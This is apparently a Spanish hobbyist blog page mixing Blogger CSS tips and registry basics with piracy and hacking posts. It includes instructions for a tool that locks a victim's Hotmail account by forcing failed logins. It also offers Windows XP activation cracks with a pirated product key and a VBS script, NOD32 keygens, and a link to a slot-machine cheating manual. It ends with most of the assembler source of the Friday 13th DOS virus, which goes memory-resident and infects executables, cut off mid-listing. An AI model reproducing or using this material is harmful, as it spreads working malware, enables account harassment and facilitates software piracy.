<span style="color: blue;"><a href="http://www.codecguide.com/download_k-lite_codec_pack_full.htm" target="_blank">**Descargar**</a></span>

Descargar Visual Basic 6.0 Portable

Visual Basic es un lenguaje de programación desarrollado por Alan Cooper para Microsoft. El lenguaje de programación es un dialecto de BASIC, con importantes añadidos. Su primera versión fue presentada en 1991 con la intención de simplificar la programación utilizando un ambiente de desarrollo completamente gráfico que facilitará la creación de interfaces gráficas y en cierta medida también la programación misma. Desde el 2001 Microsoft ha propuesto abandonar el desarrollo basado en la API Win32 y pasar a trabajar sobre un framework o marco común de librerías independiente de la version del sistema operativo, .NET Framework, a través de Visual Basic .NET (y otros lenguajes como C Sharp (C#) de fácil transición de código entre ellos) que presenta serias incompatibilidades con el código Visual Basic existente.

<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivUl_puklk29IOBGZfghpgxqkFKD_RlxrOdcw16GMxu4rgZs-xCfYiaONeYUeZR8ArC6lzgrZShAcIsdsZSZsrtjGEy3rEjAp3Jxq-a3jJHExuEo7-Jy2l8DKR69HY-BTiZ_5SmULCfcc/s1600-h/visualempresarial.JPG"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5417859407440293442" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivUl_puklk29IOBGZfghpgxqkFKD_RlxrOdcw16GMxu4rgZs-xCfYiaONeYUeZR8ArC6lzgrZShAcIsdsZSZsrtjGEy3rEjAp3Jxq-a3jJHExuEo7-Jy2l8DKR69HY-BTiZ_5SmULCfcc/s320/visualempresarial.JPG" style="cursor: pointer; display: block; height: 246px; margin: 0px auto 10px; text-align: center; width: 320px;" /></a>

Visual Basic (Visual Studio) constituye un IDE (entorno de desarrollo integrado o en inglés Integrated Development Enviroment) que ha sido empaquetado como un programa de aplicación, es decir, consiste en un editor de código (programa donde se escribe el código fuente), un depurador (programa que corrige errores en el código fuente para que pueda ser bien compilado), un compilador (programa que traduce el código fuente a lenguaje de máquina), y un constructor de interfaz gráfica o GUI (es una forma de programar en la que no es necesario escribir el código para la parte gráfica del programa, sino que se puede hacer de forma visual).

Host : Badongo.com
Tamaño : 42MB

<a href="http://www.badongo.com/file/19206416"><span style="color: red;"><b>**Descarga**</b></span><b></b></a>

Descargar Chau Msn

chau msn

Descarga de Chau Msn tambien contiene el icecold reloaded, anque con la llegada de Chau msn es preferible usar Chau Msn porque no se abren ventanas de internet como pasa con el icecold reloaded.

Para los que no sepan que hace Chau Msn y Icecold Reloaded:
Son programas que bloquean cuentas de hotmail, tambien se utiliza el termino "congelar" pero realmente lo que hacen es bloquearlas porque intentan acceder a la cuenta de hotmail que tu le indiques, lo que se hace es loguearse con la cuenta que se puso con passwords incorrectos, entonces el servidor de hotmail bloquea la cuenta para evitar que se realizen ataques por fuerza bruta...a mi criterio es una buena seguridad, pero vaya! que vunerabilidad tiene al toparse con estos programas.


Para bloquear una cuenta lo unico que tienen que hacer es colocar el msn de la victima y poner bloquear cuenta, esperar que termine de cargar todo y dejarlo abierto al programa, o minimizado. La proxima ves que la victima intente entrar al msn le saldra un cartel como este, y no podra iniciar secion:

cuenta bloquedada

El funcionamiento del Icecold Reloaded es el mismo.

Icecold Reloaded

Descargar
Descargalo!!
Mirror Chau Msn Megaupload

Dev-C++ - Descargar | IDE

DevC++

Dev-C++ es un compilador y entorno de desarrollo para C/C++. Consiste en un editor de múltiples ventanas integrado con un compilador que nos permitirá una compilación, un enlace y una ejecución de aplicaciones rápida y de fácil uso.

Dev-C++ nos ofrece la opción de realzamiento de sintaxis. Incluye también un debugger y un creador de instaladores, además de 150 ficheros y 100 librerías.

Algunas de las posibilidades que Dev-C++nos ofrece son: recopiladores de la ayuda GCC-based, corrección de errores integrado (Usa GDB), ayuda para los idiomas múltiples (localización), explorador de clases, depurador de código, poder eliminar errores en el explorador de variables, asistente de Proyecto, editor más óptimo

Dev-C++ también cuenta con bibliotecas estáticas y DLL, ayuda de plantillas para crear sus propios tipos del proyecto, creación del makefile, corrija y compile los archivos del recurso, mejora en la ayuda de la impresión, mejoras en las instalaciones, instalación fácil de bibliotecas adicionales, ayuda de CVS, etc.

Esta es una version portable que puedes usar solo con conectar tu USB a un pc.

Lo pueden descargar dando clic aqui o tambien desde la pagina de Descargas

Servidor de descarga: Megaupload
Version: 4.9.9.2
Idioma: Ingles - Español
Autor: Bloodshed
Tamaño: 60MB (Descomprimido) 20MB (Comprimido)

Abrir/Cerrar la unidad de disco CD | Windows Based Script Host | VBS

Les dejo este codigo en Microsoft (R) Windows Based Script Host que sirve para abrir la unidad de CD:



Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If


Y tambien el que sirve para cerrarla, he visto que en muchas webs tienen el codigo para abrirla pero no para cerrarla e incluso en otra vi que habia otro codigo que la abria y la cerraba pero la abria y en cuanto la abria la cerraba, y es util pero no si vas a meter un disco en la unidad, imaginate mientras vas a meter el disco ya se cerraria, pues no asi no sirve el codigo, por eso aqui dejo el codigo que la abre y la cierra hasta que tu quieras cerrarla, este codigo es propiedad de Hack Diseño® sin embargo puedes distriubirlo pero recuerda poner la fuente de donde lo extraiste o nuestra direccion.

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
colCDROMs.Item(i).Eject
colCDROMs.Item(i).Eject <----Lo unico que le debes agregar es esta linea.


El codigo debe ser guardado con el nombre que quieras pero en extension .vbs
Ejemplo: abrirCD.vbs

O tambien descargarte nuestro programa que te pregunta si quieres abrir la unidad de CD y despues de abrirla te pregunta si quieres cerrarla.
En la seccion de descargas ahi lo encontraras su nombre es CDCO.

Esto puede ser util para aquellos que estan diseñando un virus y quieren que el virus abra o cierre la unidad de CD. XD

Autorun | Windows (Codigo)

Hoy les mostrare algunos comandos que funcionan con el autorun.inf
escribo esto porque uno de nuestros visitantes nos envio
un correo con algo referido a esto.

Les dejo una lista con unos comandos y una descripcion de como funcionan.

Icon
Descripcion:
Especifica el icono que se mostrará para la unidad.
La sintaxis es Icon=Fichero_de_icono
También puede indicar un fichero que no sea de icono, como un ejecutable o una dll.
Pero lo tipico es usar un fichero con extension .ico.

Label
Descripcion:
Este comando sirve para ponerle un nombre a la unidad.
Ejemplo de sintaxis:
label=Mi memoria
label=Mi CD
puede ser lo que quieras.

Open
Descripcion:
Especifica la aplicación que se ejecutara al iniciar el CD o USB.
La sintaxis es Open=Fichero_ejecutable
Pero si lo que quieres es ejecutar un fichero que no se de una aplicacion
puedes usar la siguiente sintaxis:
Open=Start “Mi página web.htm”
Aqui se puede ver que con el comando open abrimos el comando start y el comando start
abrira el fichero .htm de esta forma puedes abrir ficheros diferentes a los de una aplicacion.

UseAutoPlay
Descripcion:
Esta solo sirve para una cosa y para abrir la ventana de reproduccion automatica.
Esta es la unica sintaxis que existe:
UseAutoPlay=1 no debes cambiar el numero dejalo en 1.



ShellExecute
Descripcion:
Esta sirve para correr archivos no ejecutables, pero sin embargo no es recomendable usarla porque shellexecute no esta presente en todas las versiones de windows ya que depende de la dll shell32.dll y solo esta presente Windows 2000 y Millennium.
Asi que si incluyes este comando en el Autorun.inf y no es Windows 2000 y Millennium no funcionara, por lo tanto es mejor usar Start en el comando Open.

Shell\...
Descripcion:
En este se pueden añadir opciones al menu contextual que aparece al hacer clic con el botón derecho del ratón sobre la unidad. Estas opciones deben ir en parejas ejemplos de sintaxis:
Shell\Identificador=Texto_a_mostrar
Shell\Identificador\Command=Aplicación
Ejmplos de uso:
Para abrir el bloc de notas tenrian que escribir esto:
Shell\bloc=Abrir el &Bloc-de-notas ---->aqui le indicamos el texto que quermos que aparezca en el menu contextual.
Shell\bloc\Command=notepad.exe ----->aqui le indicamos la aplicacion que queremos abrir.
La línea Shell\Identificador\command=Aplicación funciona igual que Open, ya tambien le podemos indicar que abra un archivo no ejecutable pero tambien debemos usar start.

Asi deberia quedarnos un autorun.inf que tiene archivos en diferente ubicacion osea que no estan en la raiz de la unidad ya se CD o USB.
[Autorun]
Icon=Carpeta\Fichero_icono
Open=Carpeta\Fichero_ejecutable
Y por ultimo, les dejo un autorun con los comandos que escribimos anteriormente y algunos mas que ahi mismo explico.

[Autorun]
Open=aplicacion.exe
Icon=miicono.ico
Label=Mi memoria
UseAutoPlay=1
action=Abrir USB -->Texto que queremos que nos muestre la memoria cuando la opcion UseAutoPlay esta activada.
action= @aplicacion.exe -->aqui ponemos siempre "@" sin las comillas seguida del nombre del ejecutable que queremos que se ejecute.
shell\open=Abrir &aplicacion
shell\open\Command=aplicacion.exe
shell\open\Default=1 --->este valor no debe ser cambiado.


Es todo si tienen algun problema envien un correo dando click en el boton de contactanos, y nos envian su duda o problema, trataremos de responder lo mas pronto posible.

Manual para hacer dispositivo para ganar a maquinas tragamonedas (Gratis)

En nuestra seccion de descargas pueden bajar este manual.
Decidimos ponerlo porque he visto que mucha gente lo esta vendiendo.
Pero aqui lo pueden descargar gratis.

aqui lo pueden descargar

Y este manual lo encontramos aqui en esta pagina...pero como estoy seguro que puede desaparecer el link de ahi pues por eso lo comparto con ustedes poniendolo en otro hosting.
http://www.emudesc.net/foros/anade-tus-manuales/134538-manual-del-dispositivo-de-tragamonedas.html

Ocultar el titulo en blogger (Cabecera - Header)

Si no quieres que aparezca un titulo en tu blog lo unico que tienes que hacer es esto: ir a Diseño--->Edicion de HTML y una vez ahi buscas este codigo:

#header {
margin: 5px;
//border: 1px solid $bordercolor;
text-align: center;
}
Y solo le agregamos esto:
display:none;
El codigo debe quedar asi
#header {
margin: 5px;
//border: 1px solid $bordercolor;
text-align: center;
display:none;
}


Si por alguna razon el codigo no es igual solo hay que agregar display:none;
a cualquier codigo pero en el Header porque si no no funciona.

Hacer windows XP SP2 original

Hola les traigo un crack para windows con dos soluciones:
la primera es la mas sencilla.
1.-Descargarse este archivo
2.- Ejecutarlo..
3.- Entramos a esta pagina
http://www.microsoft.com/genuine/downloads/FAQ.aspx y ahi validamos
nuestro windows y listo es todo!!..

Esta es la segunda opcion:
1.- Abrir un documento de texto nuevo con el block de notas, pegar lo siguiente:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"ProductId"="55274-640-1011873-23081"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,31,30,31,31,
38,37,33,2d,32,33,30,38,31,00,2e,00,00 ,00,41,32,32,2d,30,30,30,30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a,a3,78,8e,8f,98
,5c,00,00,00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00 ,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00,00,00,00,00,
00,00,b5,16,00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00 ,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 ,66,e5,70,f3
"LicenseInfo"=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7c,c6,35,51,fd,52,57,17,86,3e,18,d3,f4,8c,8e
,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9 ,9a,35,17,46,7a,4f,91,fc,4a,d9,db,64,5c,c4,e2,0f,34,f3,ea
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]

2.- Guardar el archivo con extension .reg y con el
nombre que quieras ejem:crackw.reg despues lo ejecutan
y les preguntara que si quieren agregar informacion al el registro le dan click
en el boton de si.
3.- Entramos a esta pagina
http://www.microsoft.com/genuine/downloads/FAQ.aspx y validamos.
y listo WINDOWS es original..!!

Gracias por su visita.
Dejen comentario por favor.

Posible solucion para el codigo de error bX-39cc9q en blogger

En algunos sitio ya circula esta informacion pero al parecer no funciona para todos los blogs nosotros no hemos probado ya que se veria afectado el diseño de nuestro blog pero vamos a intentarlo en otro blog de pruebas.

De todas formas aqui les dejo la informacion de como darle una posible solucion:

  • Abre el archivo XML de la plantilla que quieras instalar con WordPad (click derecho del ratón > abrir con > WordPad. Si lo editas con el bloc de notas comprobarás que es mucho más complicado encontrar los códigos de los widgets.



  • Busca el código HTML referente al div del sidebar en la plantilla. En la mayoría de los casos suele estar abajo del todo.


  • Elimina cada widget que contenga, suprimiendo para ello el código comprendido desde
    <b:widget…> hasta </b:widget>. Por ejemplo:
    <b:widget id=’BlogArchive1&#8242; locked=’false’ title=’Archivo del blog’ type=’BlogArchive’>
    <b:includable id=’main’>
    <b:if cond=’data:title’>
    <h2><data:title/></h2>
    </b:if>
    <div class=’widget-content’>

    </b:widget>
    Guarda los cambios y prueba ahora a subir la plantilla de nuevo.


  • Espero que les sirva.
    HACK DISEÑO®

    Sobre el error “bX-39cc9q” en Blogger

    Hola visitantes de Hack Diseño hoy les traigo esta noticia de la que tal vez algunos ya se dieron cuenta es acerca de el error bX-39cc9q en blogger realmente no se sabe que sucedio pero al intentar subir una plantilla o guardar cambios nos da este codigo de error por este problema fue que Hack Diseño estuvo inactivo 1 dia.

    Nota:Informacion extraida de algunos sitios como zonacerebral.com

    Aqui nos comenta el webmaster de este sitio acerca de el problema.

    "Hoy, como tantos otros domingos, tenía pensado comenzar a adaptar una nueva plantilla para Blogger. Siguiendo el protocolo, tras crear el blog con el nombre del diseño y publicar las entradas en la página de demostración, me disponía a subir la plantilla que utilizo como base para adaptar otros diseños. Sin embargo, el servicio de Blogger devolvía una y otra vez el error bX-39cc9q al tratar de subir esta o cualquier otra plantilla:

    blogger-error




    Lo cierto es que hace unos días, cuando adapté la plantilla de Codigo Geek, también experimenté un problema similar al guardar los cambios en el modo de edición HTML estando activada la casilla “Expandir plantillas de artilugios”, pero por suerte este contratiempo desapareció sin acción alguna por mi parte en 30 minutos aproximadamente.

    Después de descartar posibles causas debidas al navegador, a los datos privados del mismo o a la plantilla, he estado buscando información al respecto en algunos grupos de Google y parece ser que el error lleva apareciendo desde hace dos días sin razón aparente al intentar subir una plantilla en la plataforma de Blogger, por lo que puede deberse a un problema interno del servicio.

    El blog que publica el estado de Blogger no ha comunicado ninguna advertencia de mantenimiento, aunque si lo hizo para el día 12 de febrero afectando al sistema de alojamiento de imágenes. Así que sólo nos queda esperar que los de Blogger lo detecten y lo solucionen en los próximos días."

    Fuente:http://zonacerebral.com/
    Al parecer hasta que solucionen problema podremos seguir blogeando.

    KeyGen Nod32 para todas las versiones

    Hola navegando en internet encontre estos keygens de contraseñas y usuarios nod32 con estos keygens nos quitamos el problema y la tediosa busqueda de contraseñas y usuarios de nod32 por internet, los keygens nos generaran las contraseñas y usuarios uno de ellos funciona diferente (es el que yo uso) este busca el usuario y la contraseña y tambien la configura automaticamente osea que ya no tenemos ni siquiera que copiar y pegar ahora solo iniciamos el keygen y le damos clic en Acciones>Obtener nueva licencia todo esto con el TNod 1.3.0c, con el otro no pude probar.
    Solo un de ellos me funciono sin embargo sospecho que el problema es de mi pc
    asi que ambos funcionan.
    Es todo por hoy espero y les sirvan ambos estan en Google Sites para todos aquellos que tienen un IP compartida o que tienen algun otro problema que no les permite bajar de algunos host (como rapidSHIT y megaSHIT).

    Archivos hosteados en Google Sites


    TNod 1.3.0c Comprobado, Funciona
    **Descargar**

    NODgen1.4 NO COMPROBADO
    **Descarga**

    Validar Windows XP SP3

    Programa para validar Windows XP SP3


    ---------------------------------------------------------------------------------
    Puedes usar cualquiera de las dos opciones validar con el programa o manualmente
    ---------------------------------------------------------------------------------

    Este serial fue probado en un WINDOWS XP SP3 pirata y valido perfectamente aqui pueden ver la imagen, yo mismo lo probe formatee un disco duro y le instale la copia de WINDOWS XP pirata y valido perfectamente con este serial, muchos seriales que encontre no me validaban porque tenian problemas con la region, pero al parecer esto se debe a que SP3 "es mas seguro"...algo asi se rumora, no se exactamente a que se deba, bueno ya basta de bla, bla, bla...

    Serial para Windows XP Professional Service Pack 3

    B77QF-DP27W-4H68R-72B48-78RPD


    Copien este codigo fuente, lo pegan en el bloc de notas y lo guardan con extension (.VBS) changeKEY.vbs despues lo ejecutan:

    -------------------------------------------------------------------------------------
    ON ERROR RESUME NEXT 
    Dim VOL_PROD_KEY 
    VOL_PROD_KEY = "B77QF-DP27W-4H68R-72B48-78RPD" 
    VOL_PROD_KEY = Replace(VOL_PROD_KEY,"-","")
    
    for each Obj in GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf ("win32_WindowsProductActivation") 
    
    result = Obj.SetProductKey (VOL_PROD_KEY) 
    
    WScript.Echo "Script por Hacko" 
    WScript.Echo "La clave ha cambiado"
    Next
    

    -------------------------------------------------------------------------------------

    Este script hecho en VBSCRIPT lo que hace es sustituir la clave que tiene tu XP por la clave que publique.

    Como ocultar o eliminar "Mostrando Entradas" | Blogger

    Tal vez a algunos les molesta o no les gusta este mensaje, que aparece al hacer una busqueda o seleccionar un categoria en el blog:


    Si no te gusta entonces lo puedes eliminar o tambien ocultar bueno para eliminarlo es muy sencillo vas a hacer lo siguiente:

    Ir a Diseño/ Edición de HTML y activas la casilla Expandir plantillas de artilugios y buscas esta línea:

    <b:include data='top' name='status-message'/>

    una vez que la hayas encontrado entonces borras esa linea y listo sera eliminado.

    Pero si lo que quieres es ocultar el mensaje entonces solo haz lo siguiente:

    Ir a diseño de la plantilla. Después clic en Edición de HTML (no Expandir plantillas de artilugios) y agregas el siguiente código entre <b:skin><![CDATA[ y ]]></b:skin>. Preferible que lo pegues casi al final (antes de ]]></b:skin>), porque puede ser que en algún momento, no quieras esto y se te va hacer más fácil poder ubicarlo para borrarlo.

    .status-msg-wrap {
    visibility:hidden;
    display:none;
    }

    Cursores Css Blogger | Cambiar al pasar sobre una Imagen o Link

    Lo unico que tenemos que hacer, es esto. Ya que tenemos el codigo de la imagen agregada, como este:

    <img src="la url de la imagen">

    Solo tendremos que agregar el siguiente codigo : (incluyendo el amarillo ahi se pone el nombre de el cursor que pues ser por ejem:crosshair)

    <img style="CURSOR: aqui-el-nombre-del-cursor-que-quieran" src="la url de la imagen">

    Se puede agregar en un enlace tambien, cuando hacemos un enlace, el codigo nos queda asi:

    <a href="aqui-la-url-del-enlace">aqui el texto</a>

    Solo tendriamos que agregar el codigo siguiente: (incluyendo el amarillo ahi se pone el nombre de el cursor que pues ser por ejem:crosshair)

    <a style="CURSOR: aqui-el-nombre-del-cursor-que-quieran" href="aqui-la-url-del-enlace">aqui el texto</a>

    Los nombres de los tipos de cursores que podemos agregar son estos: (pasen el cursor encima de la palabra para ver su efecto)

    default
    crosshair
    hand
    move
    nw-resize
    ne-resize
    n-resize
    e-resize
    help
    text
    wait

    Registro del Sistema

    Hoy hablare un poco del editor de registro, regedit o registro del sistema, como acostumbres a llamarlo, hablaremos de lo que es y como se abre bueno comenzemos.

    El registro del sistema, o registro de Windows, es una base de datos que almacena las configuraciones y opciones del sistema operativo Microsoft Windows en sus versiones de 32 bits, 64 bits y Windows Mobile.

    Contiene información y configuraciones de todo el hardware, software, usuarios, y preferencias del PC. Si un usuario hace cambios en las configuraciones del "Panel de control", en las asociaciones de ficheros, en las políticas del sistema o en el software instalado, los cambios son reflejados y almacenados en el registro.

    Bueno pero ¿Como se abre el editor de registro?

    Windows XP Para acceder al registro de Windows XP hay que ir a Inicio, Ejecutar, escribir "REGEDIT" o "REGEDT32" y presionar [Intro]. Evidentemente, también puede accederse a este programa mediante el Explorador de Windows.


    Windows Vista Para acceder al registro en Windows Vista, hay que abrir a la barra de Inicio (donde está el logotipo de Windows), teclear "REGEDIT" en la barra de búsqueda y presionar [Intro].
    Por ahora es todo pero mas adelante pondremos varias modificaciones al registro asi como otras cosas esperen a verlo.

    El Registro se almacena en varios ficheros que, dependiendo de la versión de Windows, se ubican en diferentes lugares dentro del sistema local, excepto NTuser (o archivo de usuario), que puede ser ubicado en otra máquina para permitir perfiles móviles.


    Windows NT, 2000, XP, Server 2003 y Vista Los siguientes archivos del Registro se encuentran en %SystemRoot%\System32\Config\:

    Sam - HKEY_LOCAL_MACHINE\SAM
    Security - HKEY_LOCAL_MACHINE\SECURITY
    Software - HKEY_LOCAL_MACHINE\SOFTWARE
    System - HKEY_LOCAL_MACHINE\SYSTEM
    Default - HKEY_USERS\DEFAULT
    Userdiff
    En la carpeta %SystemRoot%\repair se encuentra una copia de seguridad.

    El siguiente archivo se encuentra en cada carpeta de usuario:

    NTUSER.dat

    Windows 9x/ME Los archivos de registro se denominan User.dat y System.dat y se encuentran en el directorio \WINDOWS. En Windows ME, además, está el archivo Classes.dat.

    Windows 3.11 El Registro se llama Reg.dat y se encuentra en el directorio \WINDOWS.

    Codigo fuente del virus Viernes 13 | Assembler

    Hola este es el codigo fuente del virus "Viernes 13" escrito en lenguaje assembler.

    VIRUS:"MAKE"
    @echo off
    echo ABOUT TO ASSEMBLE CRYPT NEWSLETTER 13 VIRAL OBJECTS!!
    pause
    DEBUG
    Lo guardamos en extension .bat
    VIRUS:"VIERNES 13"
    ;
    ; Nombre : Desensamblado del virus Viernes 13
    ; Versi¢n : 1.00
    ; Fecha : 19/03/1990 por Jordi Mas
    ; Observ. : Para ensamblar usar Turbo Assembler y Turbo Link de Borland
    ;
    ;
    ; Para obtener un ejecutable:
    ; Tasm Friday13
    ; Tlink Friday13
    ;
    ;


    fin_virus equ offset fin_programa
    fin_codigo equ offset fin_programa - 110h
    sp_usuario equ offset fin_programa - 10h

    ;--------------------------------------------------------------------------
    bios segment at 0h ; Datos consultados por el virus
    org 03FCh ; en el segmento cero.
    intff label dword
    intff_off dw ?
    intff_seg db ?
    bios ends
    ;--------------------------------------------------------------------------

    programa segment ; este es el programa que se supone ha
    start: mov ax,4C00h ; infectado el virus
    int 21h
    programa ends
    ;--------------------------------------------------------------------------
    codigo segment stack
    assume cs:codigo,ds:nothing,es:nothing,ss:codigo
    org 0

    jmp inicio_com
    db 73h,55h
    identidad db 'MsDos'
    ini_prog label dword ; Inicio del programa infectado si es COM
    ini_prog_off dw 0
    ini_prog_seg dw 0
    viernes_13 db 0 ; Flag es 1 si es Viernes 13
    npi dw 0
    longitud_prog dw 0 ; Puntero al final del programa (o longitud si
    ; es COM)
    old_int8 label dword ; Contenido del antiguo vector INT 8h
    old_int8_off dw 0 ; Timer
    old_int8_seg dw 0
    old_int21 label dword ; Contenido del antiguo vector INT 21h
    old_int21_off dw 0 ; Gestor de funciones DOS
    old_int21_seg dw 0
    old_int24 label dword ; Contenido del antiguo vector INT 24h
    old_int24_off dw 0 ; Gestor de Errores cr¡ticos
    old_int24_seg dw 0
    retardo dw 0 ; Contador para efecto scroll
    no_usado8 dw 0
    no_usado_nada label dword
    no_usado10 dw 0
    no_usado7 dw 0
    no_usado9 dw 0
    no_usado6 dw 0
    no_usado3 dw 0
    no_usado5 dw 0
    no_usado4 dw 0
    cspri1 dw 0
    num_parra dw 0 ; Numero de parrafos que usa el virus
    ; Bloque de Parametros
    ; para el programa autentico

    bloque_entorn dw 0
    ordenes_off dw 80h
    ordenes_seg dw 0
    fcb1_off dw 5Ch
    fcb1_seg dw 0
    fcb2_off dw 6Ch
    fcb2_seg dw 0


    sp_original dw offset sp_usuario
    ss_original dw 0 ; desplazamiento de SS original
    dir_ejecucion label dword ; direccion de ejecucion programa si es EXE
    ip_original dw offset start
    cs_original dw 0 ; despalzamiento de CS original
    old_intff_off dw 0
    old_intff_seg db 0
    com_o_exe db 0 ; 1 si EXE. 0 si COM
    ; CABECERA EXE
    cabecera_exe db 4Dh,5Ah
    resto_512 dw 0
    mod_512 dw 0
    elem_reub dw 0
    tam_cabec dw 0
    min_parr dw 0
    max_parr dw 0
    off_pila dw 0
    sp_inic dw 0
    chksum dw 0
    ip_inic dw 0
    off_cs dw 0
    off_prim dw 0
    overlay dw 0

    buff_cadena db 5 dup (0)
    handle dw 0 ; Si tiene 0FFFFh ha habido error de disco
    atrib_fich dw 0 ; atributo fichero a infectar
    fecha dw 0 ; Fecha fichero a infectar
    hora dw 0 ; Hora fichero a infectar

    bytes_512 dw 200h
    bytes_parraf dw 10h
    espacio_disk1 dw 0
    espacio_disk2 dw 0

    nom_prog label dword
    nom_prog_off dw 0 ; Offset y Segmento de la cadena que contiene
    nom_prog_seg dw 0 ; el nombre del programa en INT 21h (ah=4Bh)

    command db 'COMMAND.COM'
    temporal dw 0 ; Variable temporal , varios usos
    cuatro_bytes db 0,0,0,0

    inicio_com: cld
    mov ah,0E0h
    int 21h ; Comprueba si esta virus en RAM
    cmp ah,0E0h
    jae no_virus1 ; salta si no esta el virus
    cmp ah,03
    jb no_virus1 ; salta si no esta el virus

    mov ah,0DDh ; esta el virus, ejecuta el programa real
    mov di,100h
    mov si,fin_virus
    add si,di
    mov cx,cs:[di+offset longitud_prog]
    int 21h

    no_virus1: mov ax,cs
    add ax,10h
    mov ss,ax
    mov sp,sp_usuario
    push ax ; Salto a Inicio_exe, usado por
    mov ax,offset inicio_exe ; los ficheros COM tambien.
    push ax
    retf

    inicio_exe: cld
    push es
    mov cs:cspri1,es
    mov cs:ordenes_seg,es
    mov cs:fcb1_seg,es
    mov cs:fcb2_seg,es
    mov ax,es
    add ax,10h
    add cs:cs_original,ax
    add cs:ss_original,ax
    mov ah,0E0h ; Comprueba si el virus esta
    int 21h ; en memoria
    cmp ah,0E0h
    jae no_virus2
    cmp ah,03
    pop es
    mov ss,cs:ss_original
    mov sp,cs:sp_original ; Salta al inicio del virus
    jmp cs:dir_ejecucion

    no_virus2: xor ax,ax
    mov es,ax
    mov ax,es:[3FCh]
    mov cs:old_intff_off,ax
    mov al,es:[3FEh]
    mov cs:old_intff_seg,al
    assume es:bios
    mov es:intff_off,0A5F3h
    mov es:intff_seg,0CBh ; Procede a la instalaci¢n
    pop ax ; en memoria del virus
    add ax,10h
    mov es,ax
    assume es:codigo
    push cs
    pop ds
    mov cx,fin_virus
    shr cx,1
    xor si,si
    mov di,si
    push es
    mov ax,offset sigue_aqui
    push ax ; Salta a una rutina en la parte
    jmp far ptr intff ; baja de la memoria que
    ; copia el virus en memoria

    sigue_aqui: mov ax,cs
    mov ss,ax ; Establece los valores por
    mov sp,sp_usuario ; defecto de los segmentos
    xor ax,ax
    mov ds,ax
    assume ds:bios
    mov ax,cs:old_intff_off
    mov ds:intff_off,ax
    mov al,cs:old_intff_seg
    mov ds:intff_seg,al
    mov bx,sp
    mov cl,4
    shr bx,cl ; Convierte la direccion en
    add bx,10h ; paragrafos
    mov cs:num_parra,bx
    mov ah,4Ah ; Reserva mas memoria para el
    mov es,cs:cspri1 ; virus.
    int 21h

    mov ax,3521h
    int 21h
    mov cs:old_int21_off,bx ; Guarda la interrupci¢n 21h
    mov cs:old_int21_seg,es ; antigua.

    push cs
    pop ds ; Desvia la interrupcion 21h
    assume ds:codigo ; hacia el virus...
    mov dx,offset new_int21
    mov ax,2521h
    int 21h

    mov es,cspri1
    mov es,es:[02ch] ; Busca dentro de la variable
    xor di,di ; de entorno posicion 2ch del PSP
    mov cx,7FFFh
    xor al,al
    bucle: repne scasb
    cmp es:[di],al
    loopnz bucle

    mov dx,di
    add dx,3
    mov ax,4B00h
    push es
    pop ds
    push cs
    pop es
    mov bx,0035h
    push ds
    push es
    push ax
    push bx
    push cx
    push dx

    mov ah,2Ah ; Consulta la fecha de hoy
    int 21h
    mov cs:viernes_13,0 ; Pone el contador de viernes a 0
    cmp cx,07C3h ; Comprueba si es el anyo 1987...
    je ejec_real
    cmp al,5
    jne pon_nueva_8 ; Si es el dia de la semana
    cmp dl,0Dh ; 5 (Viernes) y el dia 13
    jne pon_nueva_8 ; entonces pone a uno el contador
    inc cs:viernes_13 ; de la variable viernes 13
    jmp ejec_real ; y entra en funcionamieto....

    pon_nueva_8: mov ax,3508h
    int 21h
    mov cs:old_int8_off,bx
    mov cs:old_int8_seg,es ; Si es Viernes 13 entonces deja
    push cs ; una rutina residente de la
    pop ds ; INT 8 y cuando lleve 30
    mov retardo,7E90h ; minutos aproximadamente
    mov ax,2508h ; empieza un bucle de retardo...
    mov dx,offset new_int8
    int 21h

    ejec_real: pop dx
    pop cx
    pop bx
    pop ax
    pop es
    pop ds
    pushf
    call cs:old_int21
    push ds
    pop es
    mov ah,49h ; Libera la memoria que habia
    int 21h ; reservado el virus para el
    mov ah,4Dh
    int 21h
    mov ah,31h ; Deja residente el codigo del
    mov dx,fin_codigo ; virus Viernes 13.
    mov cl,4
    shr dx,cl ; Convierte la direccion final
    add dx,10h ; del virus a paragrafos.
    int 21h
    ;-------------------------------------------------------------------------
    ;
    ; Rutina a la cual se desvia la INT 24h para que no muestre errores
    ;

    new_int24: xor al,al
    iret

    ;-------------------------------------------------------------------------

    new_int8: cmp cs:retardo,2 ; Rutina que se cuelga de la
    jne decrementa ; interrupcion 8 para realizar
    push ax ; el retardo del sistema
    push bx
    push cx
    push dx
    push bp
    mov ax,0602h ; Haze un scroll de una peque¤a
    mov bh,87h ; parte de la pantalla
    mov cx,0505h
    mov dx,1010h
    int 10h
    pop bp
    pop dx
    pop cx
    pop bx
    pop ax
    decrementa: dec cs:retardo
    jnz retorna_8
    mov cs:retardo,1
    push ax
    push cx
    push si
    mov cx,4001H ; Realiza un retardo leyendo 4001
    rep lodsb ; veces una misma posicion de
    pop si ; memoria
    pop cx
    pop ax
    retorna_8: jmp cs:old_int8

    ;-------------------------------------------------------------------------

    new_int21: pushf
    cmp ah,0E0h ; Nueva funci¢n del virus
    jne otras_func
    mov ax,0300h
    popf
    iret

    otras_func: cmp ah,0DDh ; Establece todas las nuevas
    je ejec_real_com ; funciones del virus en la
